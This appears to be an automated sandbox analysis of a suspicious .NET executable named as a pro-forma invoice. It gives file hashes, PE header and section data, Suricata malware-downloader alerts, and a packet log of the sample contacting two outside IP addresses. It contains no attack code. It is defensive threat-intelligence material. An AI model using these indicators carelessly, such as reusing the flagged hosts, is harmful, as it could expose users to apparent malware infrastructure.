TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PROFORMA + PENDENTES.exe
File size:	617'984 bytes
MD5:	4d74cebd8ddaae78de8144f1abb245e5
SHA1:	8e8423e4af53a91b9750014235773f9ec38916df
SHA256:	2a2625e85758dfdc4ab64036bb679f519b8802ecccdba37eec44fb99e68e35a9
SHA512:	db4959b2a762416a62fc95fd06c5b5836189ef6e785cfaaaa2e26e28602a8db2aa71893dd72833490cdf631321ac6c7ab5a168bbf671dfa1bb98ab8c827d3426
SSDEEP:	12288:fYVqW8F9057V2WnuYJBcw/6oxYP4Tl9SZZGQ4qS6q:rLs0WnuYP6KeokZZGdqbq
TLSH:	E3D412E817A90337C27FA9B7673171A443B5EE5B64A2D34E49C460D9AB83F2121633D3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s.;g..............0..N..........~l... ........@.. ....................................@................................

File Icon


Icon Hash:	0595150b64f0390f

Static PE Info

General

Entrypoint:	0x496c7e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673B1273 [Mon Nov 18 10:09:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x96c2c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x98000	0x1ab8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x94c84	0x94e00	95f4ea772231c7b22cbb21f26d968d72	False	0.9060384524559194	data	7.8959477360806245	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x98000	0x1ab8	0x1c00	1649bb892b7b83cfc2f4638a1c54c56f	False	0.8041294642857143	data	7.2180470687303355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9a000	0xc	0x200	2c47834b67a360980f9437dbe0a074e9	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x98100	0x1439	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9592428047131544
RT_GROUP_ICON	0x9954c	0x14	data	1.05
RT_VERSION	0x99570	0x348	data	0.43333333333333335
RT_MANIFEST	0x998c8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-18T18:18:44.688413+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49709	158.101.44.242	80	TCP
2024-11-18T18:18:46.219431+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49709	158.101.44.242	80	TCP
2024-11-18T18:18:46.999640+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49712	188.114.97.3	443	TCP
2024-11-18T18:18:47.703797+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49713	158.101.44.242	80	TCP
2024-11-18T18:18:49.988518+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49716	188.114.97.3	443	TCP
2024-11-18T18:18:50.657522+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49717	158.101.44.242	80	TCP
2024-11-18T18:18:51.735169+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49717	158.101.44.242	80	TCP
2024-11-18T18:18:52.714103+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49722	188.114.97.3	443	TCP
2024-11-18T18:18:53.453796+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49724	158.101.44.242	80	TCP
2024-11-18T18:18:54.183906+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49727	188.114.97.3	443	TCP
2024-11-18T18:18:54.487444+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49729	188.114.97.3	443	TCP
2024-11-18T18:18:54.891309+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49731	158.101.44.242	80	TCP
2024-11-18T18:18:57.885212+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49737	188.114.97.3	443	TCP
2024-11-18T18:19:01.307167+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49741	188.114.97.3	443	TCP
2024-11-18T18:19:03.984760+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49743	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 18:18:43.814687967 CET	49709	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:43.820096970 CET	80	49709	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:43.820173979 CET	49709	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:43.820655107 CET	49709	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:43.825695038 CET	80	49709	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:44.475091934 CET	80	49709	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:44.486680031 CET	49709	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:44.491719007 CET	80	49709	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:44.635963917 CET	80	49709	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:44.688412905 CET	49709	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:44.708462954 CET	49711	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:44.708497047 CET	443	49711	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:44.708648920 CET	49711	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:44.736424923 CET	49711	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:44.736444950 CET	443	49711	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:45.428107023 CET	443	49711	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:45.428184032 CET	49711	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:45.475187063 CET	49711	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:45.475217104 CET	443	49711	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:45.475631952 CET	443	49711	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:45.516275883 CET	49711	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:45.540380955 CET	49711	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:45.583399057 CET	443	49711	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:45.921363115 CET	443	49711	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:45.921430111 CET	443	49711	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:45.921619892 CET	49711	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:46.021318913 CET	49711	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:46.025723934 CET	49709	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:46.031239033 CET	80	49709	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:46.175990105 CET	80	49709	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:46.177891016 CET	49712	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:46.177953959 CET	443	49712	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:46.178112030 CET	49712	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:46.178402901 CET	49712	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:46.178419113 CET	443	49712	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:46.219430923 CET	49709	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:46.832295895 CET	443	49712	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:46.835072041 CET	49712	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:46.835165024 CET	443	49712	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:46.999711037 CET	443	49712	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:46.999866009 CET	443	49712	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:46.999928951 CET	49712	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:47.000377893 CET	49712	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:47.005310059 CET	49709	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:47.006447077 CET	49713	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:47.010828018 CET	80	49709	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:47.010974884 CET	49709	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:47.011420965 CET	80	49713	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:47.011521101 CET	49713	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:47.011665106 CET	49713	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:47.016447067 CET	80	49713	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:47.658689976 CET	80	49713	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:47.660134077 CET	49714	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:47.660223007 CET	443	49714	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:47.660342932 CET	49714	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:47.660609007 CET	49714	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:47.660644054 CET	443	49714	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:47.703797102 CET	49713	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:48.327665091 CET	443	49714	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:48.329941988 CET	49714	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:48.329982042 CET	443	49714	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:48.501416922 CET	443	49714	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:48.501497030 CET	443	49714	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:48.501739025 CET	49714	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:48.502131939 CET	49714	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:48.517056942 CET	49715	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:48.522129059 CET	80	49715	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:48.522219896 CET	49715	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:48.522344112 CET	49715	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:48.527677059 CET	80	49715	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:49.162628889 CET	80	49715	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:49.163978100 CET	49716	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:49.164019108 CET	443	49716	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:49.164107084 CET	49716	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:49.164403915 CET	49716	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:49.164418936 CET	443	49716	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:49.203831911 CET	49715	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:49.805617094 CET	443	49716	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:49.807279110 CET	49716	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:49.807322025 CET	443	49716	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:49.814331055 CET	49717	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:49.819299936 CET	80	49717	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:49.819386959 CET	49717	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:49.819799900 CET	49717	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:49.824567080 CET	80	49717	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:49.988544941 CET	443	49716	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:49.988630056 CET	443	49716	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:49.988699913 CET	49716	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:49.989151955 CET	49716	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:49.993772984 CET	49715	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:49.994919062 CET	49718	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:49.999229908 CET	80	49715	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:49.999332905 CET	49715	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:49.999826908 CET	80	49718	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:49.999911070 CET	49718	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:50.000060081 CET	49718	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:50.004884005 CET	80	49718	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:50.456991911 CET	80	49717	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:50.461107969 CET	49717	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:50.466075897 CET	80	49717	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:50.607223988 CET	80	49717	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:50.644622087 CET	49719	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:50.644663095 CET	443	49719	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:50.646449089 CET	49719	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:50.651505947 CET	49719	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:50.651521921 CET	443	49719	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:50.657521963 CET	49717	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:50.657566071 CET	80	49718	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:50.662024975 CET	49720	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:50.662065983 CET	443	49720	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:50.662164927 CET	49720	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:50.662414074 CET	49720	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:50.662425041 CET	443	49720	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:50.703808069 CET	49718	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:51.310565948 CET	443	49719	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.310659885 CET	49719	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.312271118 CET	49719	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.312314987 CET	443	49719	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.312601089 CET	443	49719	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.329226971 CET	443	49720	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.330740929 CET	49720	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.330760002 CET	443	49720	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.360059023 CET	49719	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.367959023 CET	49719	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.411375999 CET	443	49719	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.501487017 CET	443	49720	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.501554012 CET	443	49720	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.501830101 CET	49720	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.502185106 CET	49720	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.506640911 CET	49718	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:51.507735968 CET	49721	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:51.512023926 CET	80	49718	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:51.512073994 CET	49718	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:51.512803078 CET	80	49721	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:51.512886047 CET	49721	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:51.513005972 CET	49721	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:51.517920017 CET	80	49721	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:51.541337013 CET	443	49719	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.541404009 CET	443	49719	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.541579962 CET	49719	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.543908119 CET	49719	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.547415018 CET	49717	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:51.552496910 CET	80	49717	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:51.694720030 CET	80	49717	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:51.697295904 CET	49722	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.697323084 CET	443	49722	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.697439909 CET	49722	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.697799921 CET	49722	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:51.697824955 CET	443	49722	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:51.735168934 CET	49717	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.162961006 CET	80	49721	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:52.164582968 CET	49723	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:52.164627075 CET	443	49723	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:52.164711952 CET	49723	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:52.164999962 CET	49723	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:52.165014982 CET	443	49723	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:52.203804970 CET	49721	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.354984045 CET	443	49722	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:52.356821060 CET	49722	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:52.356851101 CET	443	49722	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:52.714118004 CET	443	49722	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:52.714181900 CET	443	49722	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:52.714540005 CET	49722	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:52.714865923 CET	49722	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:52.719288111 CET	49717	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.720927954 CET	49724	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.724606991 CET	80	49717	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:52.725900888 CET	80	49724	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:52.726002932 CET	49717	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.726066113 CET	49724	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.726176977 CET	49724	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.731128931 CET	80	49724	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:52.807228088 CET	443	49723	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:52.809447050 CET	49723	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:52.809470892 CET	443	49723	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:52.964313030 CET	443	49723	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:52.964394093 CET	443	49723	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:52.964972019 CET	49723	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:52.964972019 CET	49723	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:52.984128952 CET	49721	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.985241890 CET	49725	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.989548922 CET	80	49721	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:52.990199089 CET	80	49725	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:52.990298986 CET	49721	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.990326881 CET	49725	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.990466118 CET	49725	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:52.995428085 CET	80	49725	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:53.412066936 CET	80	49724	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:53.413994074 CET	49727	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:53.414037943 CET	443	49727	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:53.414228916 CET	49727	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:53.414514065 CET	49727	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:53.414525986 CET	443	49727	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:53.453795910 CET	49724	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:53.654767036 CET	80	49725	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:53.658257008 CET	49729	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:53.658307076 CET	443	49729	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:53.660260916 CET	49729	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:53.660686970 CET	49729	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:53.660696983 CET	443	49729	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:53.703927994 CET	49725	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.032872915 CET	443	49727	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:54.034554005 CET	49727	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:54.034573078 CET	443	49727	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:54.183913946 CET	443	49727	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:54.183994055 CET	443	49727	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:54.184041023 CET	49727	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:54.184554100 CET	49727	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:54.187982082 CET	49724	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.189368963 CET	49731	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.193252087 CET	80	49724	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:54.193308115 CET	49724	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.194346905 CET	80	49731	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:54.194422007 CET	49731	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.194538116 CET	49731	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.199471951 CET	80	49731	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:54.313200951 CET	443	49729	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:54.315257072 CET	49729	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:54.315289974 CET	443	49729	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:54.487478971 CET	443	49729	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:54.487571001 CET	443	49729	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:54.487653971 CET	49729	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:54.488097906 CET	49729	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:54.492182970 CET	49725	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.493093014 CET	49732	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.498112917 CET	80	49732	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:54.498178959 CET	49732	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.498285055 CET	49732	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.501349926 CET	80	49725	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:54.501429081 CET	49725	80	192.168.2.8	158.101.44.242
Nov 18, 2024 18:18:54.503206968 CET	80	49732	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:54.843444109 CET	80	49731	158.101.44.242	192.168.2.8
Nov 18, 2024 18:18:54.844803095 CET	49734	443	192.168.2.8	188.114.97.3
Nov 18, 2024 18:18:54.844827890 CET	443	49734	188.114.97.3	192.168.2.8
Nov 18, 2024 18:18:54.844890118 CET	49734	443	192.168.2.8	188.114.97.3
